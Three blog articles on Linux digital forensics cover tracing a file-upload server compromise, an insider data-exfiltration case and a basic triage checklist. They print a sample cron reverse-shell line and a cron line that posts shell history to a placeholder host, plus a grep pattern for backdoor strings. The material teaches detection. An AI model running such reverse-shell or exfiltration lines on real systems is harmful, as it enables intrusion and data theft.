
Digital Forensics: How Hackers Compromise Servers Through File Uploads

12 January 2026 at 12:30

Hello, aspiring digital forensics investigators!

In this article, we continue our journey into digital forensics by examining one of the most common and underestimated attack paths: abusing file upload functionality. The goal is to show how diverse real-world compromises can be, and how attackers can rely on legitimate features and not only exotic zero-day exploits. New vulnerabilities appear every day, often with proof-of-concept scripts that automate exploitation. These tools significantly lower the barrier to entry, allowing even less experienced attackers to cause real damage. While there are countless attack vectors available, not every compromise relies on a complex exploit. Sometimes, attackers simply take advantage of features that were never designed with strong security in mind. File upload forms are a perfect example.

Upload functionality is everywhere. Contact forms accept attachments, profile pages allow images, and internal tools rely on document uploads. When implemented correctly, these features are safe. When they are not, they can give attackers direct access to your server. The attack itself is usually straightforward. The real challenge lies in bypassing file type validation and filtering, which often requires creativity rather than advanced technical skills. Unfortunately, this weakness is widespread and has affected everything from small businesses to government websites.

Why File Upload Vulnerabilities Are So Common

Before diving into the investigation, it helps to understand how widespread this issue really is. Platforms like HackerOne contain countless reports describing file upload vulnerabilities across all types of organizations. Looking at reports involving government organizations or well known companies makes it clear that the same weaknesses can appear everywhere, even on websites people trust the most.

U.S. Department of Defense vulnerable to file upload
Reddit vulnerable to file upload

As infrastructure grows, maintaining visibility becomes increasingly difficult. Tracking every endpoint, service, and internal application is an exhausting task. Internal servers are often monitored less carefully than internet-facing systems, which creates ideal conditions for attackers who gain an initial foothold and then move laterally through the network, expanding their control step by step.

Exploitation

Let us now walk through a realistic example of how an attacker compromises a server through a file upload vulnerability, and how we can reconstruct the attack from a forensic perspective.

Directory Fuzzing

The attack almost always begins with directory fuzzing, also known as directory brute forcing. This technique allows attackers to discover hidden pages, forgotten upload forms, administrative panels, and test directories that were never meant to be public. From a forensic standpoint, every request matters. It is not only HTTP 200 responses that are interesting.
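
A quick way to see this in practice is to count the status codes in the access log. The one-liner below is a minimal sketch assuming the default Apache combined log format, where the status code is the ninth space-separated field:

bash# > awk '{print $9}' access.log | sort | uniq -c | sort -rn

A brute-force run typically produces a flood of 404s with a handful of 200s and 403s mixed in, which stands out immediately in this summary.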

In our case, the attacker performed directory brute forcing against an Apache web server and left behind clear traces in the logs. Apache typically stores its logs under /var/log/apache2 (the exact path varies by distribution), where access.log and error.log provide insight into what happened.

bash# > less access.log

showing the access log

Even without automation, suspicious activity is often easy to spot. Viewing the access log with less reveals patterns consistent with tools like OWASP DirBuster. Simple one-liners using grep can help filter known tool names, but it is important to remember that behavior matters more than signatures. Attackers can modify headers easily; in fact, bug bounty programs often require testers to set a custom header precisely so that legitimate testing can be distinguished from malicious activity.

bash# > cat access.log | grep -iaE 'nmap|buster' | sort -u

finding tools used to scan the website

You might also want to list which pages were accessed during the directory brute force by a certain IP. Here is how:

bash# > cat access.log | grep IP | awk '$9 == 200 {print $6,$7,$8,$9}'

showing accessed pages in the access log

In larger environments, log analysis is usually automated. Scripts may scan for common tool names such as Nmap or DirBuster, while others focus on behavior, like a high number of requests from a single IP address in a short period of time. More mature infrastructures rely on SIEM solutions that aggregate logs and generate alerts. On smaller systems, tools like Fail2Ban offer a simpler defense by monitoring logs in real time and blocking IP addresses that show brute-force behavior.
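
A simple behavioral check along those lines is counting requests per client IP. This is a minimal sketch assuming the combined log format, where the client address is the first field:

bash# > awk '{print $1}' access.log | sort | uniq -c | sort -rn | head

An address responsible for thousands of requests in a short window is a strong candidate for closer inspection or an automated block.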

POST Method

Once reconnaissance is complete, the attacker moves on to exploitation. This is where the HTTP POST method becomes important. POST is used by web applications to send data from the client to the server and is commonly responsible for handling file uploads.

In this case, POST requests were used to upload a malicious file and later trigger a reverse connection. By filtering the logs for POST requests, we can clearly see where uploads occurred and which attempts were successful.

bash# > cat * | grep -ai post

showing post requests

The logs show multiple HTTP 200 responses, confirming that the file upload succeeded and revealing the exact page used to upload the file.
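
To narrow the output to successful uploads only, the POST filter can be combined with a match on the status code. A minimal sketch, again assuming the combined log format:

bash# > cat access.log | grep -ai 'POST' | grep ' 200 '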

showing the vulnerable contact page

The web server was hosted locally on premises rather than in the cloud, which is why the attacker was able to reach it from the corporate network. Sometimes web servers meant for internal use are also accessible from the internet, which is a real issue. Often, contact pages that allow file uploads are secured, but other upload locations are frequently overlooked during development.

Reverse Shell

After successfully uploading a file, the attacker must locate it and execute it. This is often done by inspecting page resources using the browser’s developer tools. If an uploaded image or file is rendered on the page, its storage location can often be identified directly in the HTML. Here is an example of what it looks like:

showing how uploaded images are rendered in the html code

Secure websites rename uploaded files to prevent execution. Filenames may be replaced with hashes, timestamps, or combinations of both. In some cases, the Inspect view even reveals the new name. The exact method depends on the developers’ implementation, unless the site is vulnerable to file disclosure and configuration files can be read.
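
To illustrate the renaming idea, a server-side handler might replace the original filename with a content hash. The following is a hypothetical shell sketch, not the code of any particular framework:

bash# > mv upload.jpg "$(sha256sum upload.jpg | cut -d' ' -f1).jpg"

Because the stored name no longer matches what was uploaded, guessing the path to a planted script becomes much harder.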

Unfortunately, many websites do not enforce renaming at all. When the original filename is preserved, attackers can simply upload scripts and execute them directly.

The server’s error.log shows repeated attempts to execute the uploaded script. Eventually, the attacker succeeds and establishes a reverse shell, gaining interactive access to the system.

bash# > less error.log

showing reverse shell attempts in the error log

Persistence

Once access is established, the attacker’s priority shifts to persistence. This ensures they can return even if the connection is lost or the system is rebooted.

Method 1: Crontabs and Local Users

One of the most common persistence techniques is abusing cron jobs. Crontab entries allow commands to be executed automatically at scheduled intervals. In this case, the attacker added a cron job that executed a shell command every minute, redirecting input and output through a TCP connection to a remote IP address and port. This ensured the reverse shell would constantly reconnect. Crontab entries can be found in locations such as /etc/crontab.

bash# > cat /etc/crontab

showing crontab persistence
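
For reference, a generic entry of this kind in /etc/crontab looks roughly like the line below; the IP address and port are placeholders, and the exact payload varies between attackers:

* * * * * root bash -c 'bash -i >& /dev/tcp/203.0.113.7/4444 0>&1'

The five asterisks schedule the command for every minute, and the root field names the user it runs as.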

During the investigation, a new account was identified. System files revealed that the attacker created a new account and added a password hash directly to the passwd file.

bash# > cat /etc/passwd | grep -ai root2

showing passwd persistence

The entry shows the username, hashed password, user and group IDs, home directory, and default shell. Creating users and abusing cron jobs are common techniques, especially among less experienced attackers, but they can still be effective when privileges are limited.

Method 2: SSH Keys

Another persistence technique involves SSH keys. By adding their own public key to the authorized_keys file, attackers can log in without using passwords. This method is quiet, reliable, and widely abused. From a defensive perspective, monitoring access and changes to the authorized_keys file can provide early warning signs of compromise.

showing the ssh key persistence
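
Two sketches of what that monitoring can look like: the first lists authorized_keys files modified after a chosen date, and the second, assuming auditd is installed and "user" stands in for a real account name, watches a specific file for writes and attribute changes:

bash# > find /home -name authorized_keys -newermt '2026-01-01' -ls

bash# > auditctl -w /home/user/.ssh/authorized_keys -p wa -k ssh-persistence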

Method 3: Services

Persisting through system services gives attackers more flexibility and more room for creativity. For example, attackers might try to intimidate you by setting up a script that prints text every time you log in, such as ransom demands or other messages that convey what they are after.

showing an abused server

Services are monitored by the operating system and automatically restarted if they stop, which makes them ideal for persistence. Listing active services with systemctl helps identify suspicious entries.

bash# > systemctl list-units --state=active --type=service

listing services on linux

In this case, a service named IpManager.service appeared harmless at first glance. Inspecting its status revealed a script stored in /etc/network that repeatedly printed ransom messages. Because the service restarted automatically, the message kept reappearing. Disabling the service immediately stopped the behavior.
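
On a live system, the unit file and the script it launches can be reviewed, and the service neutralized, with standard systemctl commands:

bash# > systemctl cat IpManager.service

bash# > systemctl disable --now IpManager.service

The first command prints the unit file, revealing the script path under /etc/network, and the second stops the service and prevents it from starting again.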

This issue is widespread: new file upload vulnerabilities are reported on HackerOne constantly, not to mention the many undisclosed cases actively exploited by criminal hackers and state-sponsored groups. You really need to stay vigilant.

Summary

The attack does not end with persistence. Once attackers gain root access, they have complete control over the system. Advanced techniques such as rootkits, process manipulation, and kernel-level modifications can allow them to remain hidden for long periods of time. In situations like this, the safest response is often restoring the system from a clean backup created before the compromise. This is why maintaining multiple, isolated backups is critical for protecting important infrastructure.

As your organization grows, it naturally becomes harder to monitor every endpoint and to know exactly what is happening across your environment. If you need assistance securing your servers, hardening your Linux systems, or performing digital forensics to identify attackers, our team is ready to help.

Digital Forensics: Basic Linux Analysis After Data Exfiltration

5 January 2026 at 13:26

Welcome back, aspiring DFIR investigators!

Linux machines are everywhere these days, running quietly in the background while powering the most important parts of modern companies. They host databases, file shares, internal tools, email services, and countless other systems that businesses depend on every single day. But the same flexibility that makes Linux so powerful also makes it attractive for attackers. A simple bash shell provides everything someone needs to move files around, connect to remote machines, or hide traces of activity. That is why learning how to investigate Linux systems is so important for any digital forensic analyst.

In an earlier article we walked through the basics of Linux forensics. Today, we will go a step further and look at a scenario where a personal Linux machine was used to exfiltrate private company data. The employee worked for the organization that suffered the breach. Investigators first examined his company-issued Windows workstation and discovered several indicators tying him to the attack. However, the employee denied everything and insisted he was set up, claiming the workstation wasn’t actually used by him. To uncover the truth and remove any doubts, the investigation moved to his personal machine, a Linux workstation suspected of being a key tool in the data theft.

Analysis

It is a simple investigation designed for those who are just getting started.

Evidence

Before looking at anything inside the disk, a proper forensic workflow always begins with hashing the evidence and documenting the chain of custody. After that, you create a hashed forensic copy to work on so the original evidence remains untouched. This is standard practice in digital forensics, and it protects the integrity of your findings.

showing the evidence

Once we open the disk image, we can see the entire root directory. To keep the focus on the main points, we will skip the simple checks covered in Basic Linux Forensics (OS-release, groups, passwd, etc.) and move straight into the artifacts that matter most for a case involving exfiltration.

Last Login

The first thing we want to know is when the user last logged in. Normally you can run last with no arguments on a live system, but here we must point it to the wtmp file manually:

bash# > last -f /var/log/wtmp

reading last login file on linux

This shows the latest login from the GNOME login screen, which occurred on February 28 at 15:59 (UTC).

To confirm the exact timestamp, we can check authentication events stored in auth.log, filtering only session openings from GNOME Display Manager:

bash# > cat /var/log/auth.log | grep -ai "session opened" | grep -ai gdm | grep -ai liam

finding when GNOME session was opened

From here we learn that the last GUI login occurred at 2025-02-28 10:59:07 (local time).

Timezone

Next, we check the timezone to ensure we interpret all logs correctly:

bash# > cat /etc/timezone

finding out the time zone

This helps ensure that timestamps across different logs line up properly.

USB

Data exfiltration often involves external USB drives. Some attackers simply delete their shell history, thinking that alone is enough to hide their actions. But they often forget that Linux logs almost everything, and those logs tell the truth even when the attacker tries to erase evidence.

To check for USB activity:

bash# > grep -i usb /var/log/*

finding out information on connected usb drives

Many entries appear, and buried inside them is a serial number from an external USB device.

finding the serial number

Syslog also records the exact moment this device was connected. Using the timestamp (2025-02-28 at 10:59:25) we can filter the logs further and collect more detail about the device.
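
Assuming the traditional syslog timestamp format, a filter on that minute looks like:

bash# > grep -ai 'Feb 28 10:59' /var/log/syslog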

syslog shows more activity on the USB connections

We also want to know when it was disconnected:

bash# > grep -i usb /var/log/* | grep -ai disconnect

finding out when the usb drive was disconnected

The last disconnect occurred on 2025-02-28 at 11:44:00. This gives us a clear time window: the USB device was connected for about 45 minutes. Long enough to move large files.

Command History

Attackers use different tricks to hide their activity. Some delete .bash_history. Others only remove certain commands. Some forget to clear it entirely, especially when working quickly.

Here is the user’s history file:

bash# > cat /home/liam/.bash_history

exposing exfiltration activity in the bash history file

Here we see several suspicious entries. One of them is transferfiles. This is not a real Linux command, which immediately suggests it might be an alias. We also see a curl -X POST command, which hints that data was uploaded to an HTTP server. That’s a classic exfiltration method. There is also a hidden directory and a mysterious mth file, which we will explore later.

Malicious Aliases

Hackers love aliases, because aliases allow them to hide malicious commands behind innocent-looking names. For example, instead of typing out a long scp or rsync command that would look suspicious in a history file, they can simply create an alias like backup, sync, or transferfiles. To anyone reviewing the history later, it looks harmless. Aliases also help them blend into the environment. A single custom alias is easy to overlook during a quick review, and some investigators forget to check dotfiles for custom shell behavior.
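
As a purely hypothetical illustration (the mount path below is invented), such an alias defined in ~/.bashrc could look like this:

alias transferfiles='cp -r "/media/usb/Critical Data TECH"* ~/Documents/Data/'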

To see what transferfiles really does, we search for it:

bash# > grep -r "transferfiles" .

finding malicious aliases on linux

This reveals the real command: it copied the entire folder "Critical Data TECH*" from a USB device labeled 46E8E28DE8E27A97 into /home/liam/Documents/Data.

finding remnants of exfiltrated data

This aligns perfectly with our earlier USB evidence. Files such as Financial Data, Revenue History, Stakeholder Agreement, and Tax Records were all transferred. Network logs suggest more files were stolen, but these appear to be the ones the suspect personally inspected.

Hosts

The /etc/hosts file is normally used to map hostnames to IP addresses manually. Users sometimes add entries to simplify access to internal services or testing environments. However, attackers also use this file to redirect traffic or hide the true destination of a connection.

Let’s inspect it:

bash# > cat /etc/hosts

finding hosts in the hosts file

In this case, there is an entry pointing to a host involved in the exfiltration. This tells us the suspect had deliberately configured the system to reach a specific external machine.

Crontabs

Crontabs are used to automate tasks. Many attackers abuse cron to maintain persistence, collect information, or quietly run malicious scripts.

There are three main places cron jobs can exist:

1. /etc/crontab –  system-wide

2. /etc/cron.d/ – service-style cron jobs

3. /var/spool/cron/crontabs/ – user-specific entries

Let’s check the user’s crontab:

bash# > cat /var/spool/cron/crontabs/liam

We can see a long command scheduled to run every 30 minutes. This cron job secretly sends the last five commands typed in the terminal to an attacker-controlled machine. That includes passwords typed in plain text, sudo commands, sensitive paths, and anything else the user entered recently.
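
Here is a hypothetical reconstruction of what such an entry could look like; the host and path are placeholders, and the real one-liner may differ:

*/30 * * * * tail -n 5 /home/liam/.bash_history | curl -s -X POST --data-binary @- http://203.0.113.7/collect

User crontabs under /var/spool/cron/crontabs omit the user field, so the command begins right after the five schedule fields.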

This was unexpected. It suggests the system was accessed by someone else, meaning the main suspect may have been working with a third party, or was possibly being monitored and guided by them.

To confirm this possibility, let’s check for remote login activity:

bash# > cat /var/log/auth.log | grep -ai accepted

finding authentication in the authlog

Here we find a successful SSH login from an external IP address. This could be that unidentified person entering the machine to retrieve the stolen data or to set up additional tools. At this stage it’s difficult to make a definitive claim, and we would need more information and further interrogation to connect all the pieces.

Commands and Logins in auth.log

The auth.log file stores not only authentication attempts but also certain command-related records. This is extremely useful when attackers use hidden directories or unusual locations to store files.

To list all logged commands:

bash# > cat /var/log/auth.log | grep -ai command

To search for one specific artifact:

bash# > cat /var/log/auth.log | grep -ai mth

exposing executed commands in auth log

This tells us that the file mth was created in /home/liam using nano by user liam. Although this file contained nothing valuable, its creation shows the user was active and writing files manually, not through automated tools.

Timestomping

As a bonus step, we will look at timestamps, which are essential in forensic work. They help investigators understand the sequence of events and uncover attempts at manipulation that might otherwise go unnoticed. Timestomping is the practice of deliberately altering file timestamps to confuse investigators. Hackers use it to hide when a file was created or modified. However, Linux keeps several different timestamps for each file, and they don’t always match when something has been tampered with.

The stat command helps reveal inconsistencies:

bash# > stat api

exposing timestomping on linux

The output shows:

Birth: Feb 28 2025

Change: Nov 17 2025

Modify: Jan 16 2001

This does not make sense. A file cannot be created in 2025, modified in 2001, and changed again in 2025. That means the timestamps were manually altered. A normal file would have timestamps that follow a logical order, usually showing similar creation and modification dates. By comparing these values across many files, investigators can often uncover when an attacker attempted to clean up their traces or disguise their activity.
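
To apply the same check across a whole directory, GNU stat can print all three timestamps for each file (%w is birth, %y modify, %z change):

bash# > for f in /home/liam/*; do stat -c '%n  birth:%w  modify:%y  change:%z' "$f"; done

Any file whose modify time predates its birth time deserves a closer look.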

Timeline

The investigation still requires more evidence, deeper log correlation, and proper interrogation of everyone involved before a final conclusion can be made. However, based on the artifacts recovered from the Linux machine, we can outline a reasonable assumption of how the events might have taken place.

In the days before the breach, Liam was approached by a third-party group interested in acquiring his company’s confidential data. They gained remote access to his computer via SSH, possibly through a proxy, appearing to log in from a public IP address that does not belong to the company network. Once inside, they installed a cron job that collected Liam’s recent commands, acting as a simple keylogger. This allowed them to gather passwords and other sensitive information that Liam typed in the terminal.

With Liam’s cooperation, or possibly after promising him payment, the attackers guided him through the steps needed to steal the corporate files. On February 28, Liam logged in, connected a USB drive, and executed the hidden alias transferfiles, which copied sensitive folders onto his machine. Moments later, he uploaded parts of the data using a curl POST request to a remote server. When the transfer was done, the accomplices disconnected from the machine, leaving Liam with remnants of stolen data still sitting inside his Documents directory.

The combination of the installed cron job, the remote SSH connection, and the structured method of transferring company files strongly suggests an insider operation supported by outside actors. Liam was not acting alone; he was assisting a third party, either willingly or under pressure.

Summary

The hardest part of digital forensics is interpreting what the evidence actually means and understanding the story it tells. Individual logs rarely show the full picture by themselves. But when you combine login times, USB events, alias behavior, cron jobs, remote connections, and other artifacts, a clear narrative begins to form. In this case, the Linux machine revealed far more than the suspect intended to hide. It showed how the data was copied, when the USB device was attached, how remote actors accessed the system, and even how attempts were made to hide the tracks through timestomping and aliases. Each artifact strengthened the overall story and connected the actions into one coherent timeline. This is the true power of digital forensics: it turns fragments of technical evidence into a readable account of what really happened. And with every investigation, your ability to find and interpret these traces grows stronger.

If you want skills that actually matter when systems are burning and evidence is disappearing, this is your next step. Our training takes you into real investigations, real attacks, and real analyst workflows. Built for people who already know the basics and want to level up fast, it’s on-demand, deep, and constantly evolving with the threat landscape.

Learn more


Digital Forensics: An Introduction to Basic Linux Forensics

6 December 2025 at 10:14

Welcome back, aspiring forensic investigators.

Linux is everywhere today. It runs web servers, powers many smartphones, and can even be found inside the infotainment systems of cars. A few reasons for its wide use are that Linux is open source, available in many different distributions, and can be tailored to run on both powerful servers and tiny embedded devices. It is lightweight, modular, and allows administrators to install only the pieces they need. Those qualities make Linux a core part of many organizations and of our daily digital lives. Attackers favour Linux as well. Besides being a common platform for their tools, many Linux hosts suffer from weak monitoring. Compromised machines are frequently used for reverse proxies, persistence, reconnaissance and other tasks, which increases the need for forensic attention. Linux itself is not inherently complex, but it can hide activity in many small places. In later articles we will dive deeper into what you can find on a Linux host during an investigation. Our goal across the series is to build a compact, reliable cheat sheet you can return to while handling an incident. The same approach applies to Windows investigations as well.

Today we will cover the basics of Linux forensics. For many incidents this level of detail will be enough to begin an investigation and perform initial response actions. Let’s start.

OS & Accounts

OS Release Information

The first thing to check is the distribution and release information. Different Linux distributions use different defaults, package managers and filesystem layouts. Knowing which one you are examining helps you predict where evidence or configuration will live.

bash> cat /etc/os-release

linux os release

Common distributions and their typical uses include Debian and Ubuntu, which are widely used on servers and desktops and are stable and well documented. RHEL and CentOS appear mainly in enterprise environments with long-term support. Fedora offers cutting-edge features, Arch is a rolling-release distribution for experienced users, and Alpine is very small and popular in containers. Security-focused builds such as Kali or Parrot ship with pentesting toolsets; Kali contains many offensive tools that hackers use and can also be useful for incident response in some cases.

Hostname

Record the system’s hostname early and keep a running list of hostnames you encounter. Hostnames help you map an asset to network records, correlate logs across systems, identify which machine was involved in an event, and reduce ambiguity when combining evidence from several sources.

bash> cat /etc/hostname

bash> hostname

linux hostname

Timezone

Timezone information gives a useful hint about the likely operating hours of the device and can help align timestamps with other systems. You can read the configured timezone with:

bash> cat /etc/timezone

timezone on linux

User List

User accounts are central to persistence and lateral movement. Local accounts are recorded in /etc/passwd (account metadata and login shell) and /etc/shadow (hashed passwords and aging information). A malicious actor who wants persistent access may add an account or modify these files. To inspect the user list in a readable form, use:

bash> cat /etc/passwd | column -t -s :

listing users on linux

You can also list users who are allowed interactive shells by filtering the shell field:

bash> cat /etc/passwd | grep 'sh$'

Groups

Groups control access to shared resources. Group membership can reveal privilege escalation or lateral access. Group definitions are stored in /etc/group. View them with:

bash> cat /etc/group

listing groups on linux

Sudoers List

Users who can use sudo can escalate privileges. The main configuration file is /etc/sudoers, but configuration snippets may also exist under /etc/sudoers.d. Review both locations:

bash> ls -l /etc/sudoers.d/

bash> sudo cat /etc/sudoers

sudoers list on linux

Login Information

The /var/log directory holds login-related records. Two important binary files are wtmp and btmp. The first one records successful logins and logouts over time, while btmp records failed login attempts. These are binary files and must be inspected with tools such as last (for wtmp) and lastb (for btmp), for example:

bash> sudo last -f /var/log/wtmp

bash> sudo lastb -f /var/log/btmp

lastlog analysis on linux

System Configuration

Network Configuration

Network interface configuration can be stored in different places depending on the distribution and the network manager in use. On Debian-based systems you may see /etc/network/interfaces. For a quick look at configured interfaces, examine:

bash> cat /etc/network/interfaces

listing interfaces on linux

bash> ip a show

listing IPs and interfaces on linux

Active Network Connections

On a live system, active connections reveal current communications and can suggest where an attacker is connecting to or from. Traditional tools include netstat:

bash> netstat -natp

listing active network connections on linux

A modern alternative is ss -tulnp, which provides similar details and is usually available on newer systems.
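
For example:

bash> ss -tulnp

Note that the -l flag limits the output to listening sockets; drop it (ss -tunp) to see established connections, which is closer to what netstat -natp reports.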

Running Processes

Enumerating processes shows what is currently executing on the host and helps spot unexpected or malicious processes. Use ps for a snapshot or interactive tools for live inspection:

bash> ps aux

listing processes on linux

If available, top or htop give interactive views of CPU/memory and process trees.

DNS Information

DNS configuration is important because attackers sometimes alter name resolution to intercept or redirect traffic. Simple local overrides live in /etc/hosts, while DNS server configuration is usually in /etc/resolv.conf. Attackers may poison or tamper with either to redirect victims to malicious services. Check the relevant files:

bash> cat /etc/hosts

hosts file analysis

bash> cat /etc/resolv.conf

resolv.conf file on linux

Persistence Methods

There are many common persistence techniques on Linux. Examine scheduled tasks, services, user startup files and systemd units carefully.

Cron Jobs

Cron is often used for legitimate scheduled tasks, but attackers commonly use it for persistence because it’s simple and reliable. System-wide cron entries live in /etc/crontab, and individual service-style cron jobs can be placed under /etc/cron.d/. User crontabs are stored under /var/spool/cron/crontabs on many distributions. Listing system cron entries might look like:

bash> cat /etc/crontab

crontab analysis

bash> ls /etc/cron.d/

bash> ls /var/spool/cron/crontabs

listing cron jobs

Many malicious actors prefer cron because it does not require deep system knowledge. A simple entry that runs a script periodically is often enough.

Services

Services or daemons start automatically and run in the background. Modern distributions use systemd units which are typically found under /etc/systemd/system or /lib/systemd/system, while older SysV-style scripts live in /etc/init.d/. A quick check of service scripts and unit files can reveal backdoors or unexpected startup items:

bash> ls /etc/init.d/

bash> systemctl list-unit-files --type=service

bash> ls /etc/systemd/system

listing linux services

.bashrc and Shell Startup Files

Per-user shell startup files such as ~/.bashrc, ~/.profile, or ~/.bash_profile can be modified to execute commands when an interactive shell starts. Attackers sometimes add small one-liners that re-establish connections or drop a backdoor when a user logs in. The downside for attackers is that these files only execute for interactive shells. Services and non-interactive processes will not source them, so they are not a universal persistence method. Still, review each user’s shell startup files:

bash> cat ~/.bashrc

bash> cat ~/.profile

bashrc file on linux
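
When there are many users, one quick (and deliberately non-exhaustive) triage is to grep the startup files for strings that often appear in backdoor one-liners. This is a heuristic sketch, not a complete detection:

bash> grep -nE 'curl|wget|/dev/tcp|base64' /home/*/.bashrc /home/*/.profile

Hits are not proof of compromise, but each one is worth reading in context.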

Evidence of Execution

Linux can offer attackers a lot of stealth, as logging can be disabled, rotated, or manipulated. When the system’s logging is intact, many useful artifacts remain. When it is not, you must rely on other sources such as filesystem timestamps, process state, and memory captures.

Bash History

Most shells record commands to a history file such as ~/.bash_history. This file can show what commands were used interactively by a user, but it is not a guaranteed record, as users or attackers can clear it, change HISTFILE, or disable history entirely. Collect each user’s history (including root) where available:

bash> cat ~/.bash_history

bash history

Tmux and other terminal multiplexers normally don’t provide a persistent command log of their own. Commands executed in a tmux session run in ordinary shell processes, so whether they are saved depends on the shell’s history configuration rather than on tmux.

Commands Executed With Sudo

When a user runs commands with sudo, those events are typically logged in the authentication logs. You can grep for recorded COMMAND entries to see what privileged commands were executed:

bash> cat /var/log/auth.log* | grep -i COMMAND | less

Accessed Files With Vim

The Vim editor stores some local history and marks in a file named .viminfo in the user’s home directory. That file can include command-line history, search patterns and other useful traces of editing activity:

bash> cat ~/.viminfo

accessed files by vim

Log Files

Syslog

If the system logging service (for example, rsyslog or journald) is enabled and not tampered with, the files under /var/log are often the richest source of chronological evidence. The system log (syslog) records messages from many subsystems and services. Because syslog can become large, systems rotate older logs into files such as syslog.1, syslog.2.gz, and so on. Use shell wildcards and standard text tools to search through rotated logs efficiently:

bash> cat /var/log/syslog* | head

linux syslog analysis
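
Where zgrep is available, it searches compressed and plain rotated logs in one pass and avoids the binary output that plain cat produces on .gz files. For example, to pull cron-related entries across all rotations:

bash> zgrep -ai cron /var/log/syslog*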

When reading syslog entries you will typically see a timestamp, the host name, the process producing the entry and a message. Look for unusual service failures, unexpected cron jobs running, or log entries from unknown processes.

Authentication Logs

Authentication activity, such as successful and failed logins, sudo attempts, SSH connections and PAM events, is usually recorded in an authentication log such as /var/log/auth.log. Because these files can be large, use tools like grep, tail and less to focus on the relevant lines. For example, to find successful logins, run:

bash> cat /var/log/auth.log | grep -ai accepted

auth log accepted password

Other Log Files

Many services keep their own logs under /var/log. Web servers, file-sharing services, mail daemons and other third-party software will have dedicated directories there. For example, Apache and Samba typically create subdirectories where you can inspect access and error logs:

bash> ls /var/log

bash> ls /var/log/apache2/

bash> ls /var/log/samba/

different linux log files

Conclusion

A steady, methodical sweep of the locations described above will give you a strong start in most Linux investigations. Start by verifying the OS, recording host metadata, and enumerating users and groups, then move on to scheduled tasks and services, collecting the relevant logs and history files. Always preserve evidence carefully and collect copies of volatile data when possible. In future articles we will expand on file system forensics, memory analysis and tools that make formal evidence collection and analysis easier.
